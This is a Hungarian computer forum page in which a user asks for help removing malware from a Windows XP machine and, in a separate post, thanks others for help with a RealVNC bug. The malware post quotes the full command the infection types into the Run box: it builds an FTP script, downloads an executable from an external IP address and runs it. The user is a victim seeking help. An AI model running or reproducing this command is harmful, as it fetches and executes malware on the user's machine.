Hirdetés
- Poco F7 – bajnokesélyes
- Milyen okostelefont vegyek?
- Ismét az Apple veheti át a piacvezető pozíciót
- Jelentősen átalakulhat a Xiaomi 17 Ultra kamerarendszere
- Apple Watch
- Samsung Galaxy S25 Ultra - titán keret, acélos teljesítmény
- Vivo X200 FE – fenséges méret
- Vivo X300 Pro – messzebbre lát, mint ameddig bírja
- Xiaomi 15T Pro - a téma nincs lezárva
- Nothing Phone (2) - több, mint elsőre látszik
Új hozzászólás Aktív témák
-
válasz
BlacKSouL
üzenetére
Köszönöm a segítséget,szerencsére úgy néz ki, hogy csak alaposan benéztem a dolgokat.
A Google találatok alapján -amit Te is belinkeltél-, kiderült, hogy az általam használt RealVnc 4.1.1 bugjáról van szó, ami az újabb verzió telepítésével kiküszöbölhető. Telepítettem az újabb verziót, és úgy tűnik, valóban megszünt a jelenség.
Még egyszer köszi,
lrigo
[Szerkesztve] -
Sziasztok!
Összeszedtem valami trükkös dolgot, légyszi segítsetek! Véletlenszerű időközönként felugrik a futtatás ablak, majd mint ha gépelném, beíródik a következő parancs:
cmd /c echo OPEN 193.226.255.233 29248>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit Ezt követően felugrik a command ablak, és ott megpróbál lefutni az utasítás, de szerencsére hibaüzenettel megáll...
Amit eddig próbáltam: kikapcsolt rendszervisszaállítás mellett, csökkentett módban futtattam a Spybot, Adaware, Ccleaner és a RegClean progikat, töröltem a böngésző előzményeket, sütiket. (WinXP SP2 prof. + frissítések, Opera és Firefox böngésző)
Google keresésre nem találtam számomra értékelhető választ.
Köszi,
lrigo
[Szerkesztve]
Új hozzászólás Aktív témák
- Bitdefender Total Security 3év/3eszköz! - Tökéletes védelem, Most Ünnepi áron! :)
- BLACK FRIDAY! - Jogtiszta Windows - Office & Vírusirtó licencek- Azonnal - Számlával - Garanciával
- Stalker Clear Sky Limited Collector's Edition
- Árváltozás: Deus Ex Human Revolution Collector's Edition
- Witcher 1 Collector's Edition
- ÁRGARANCIA!Épített KomPhone i5 14400F 16/32/64GB RAM RX 9060 XT 16GB GAMER PC termékbeszámítással
- BESZÁMÍTÁS! MSI B650 R7 8700F 32GB DDR5 512GB SSD RX 6800 16GB Zalman Z1 Plus Cooler Master 750W
- iPhone XS Max 256GB Black -1 ÉV GARANCIA - Kártyafüggetlen, MS3997, 100% Akkumulátor
- Lenovo X13 Yoga 2in1 Thinkpad WUXGA Touch i5-1145G7 vPro 16GB 256GB 4G LTE GPS Win11 Pro Garancia
- HIBÁTLAN iPhone 15 Pro Max 256GB Black Titanium -1 ÉV GARANCIA - Kártyafüggetlen, MS4042
Állásajánlatok
Cég: Laptopműhely Bt.
Város: Budapest
Cég: BroadBit Hungary Kft.
Város: Budakeszi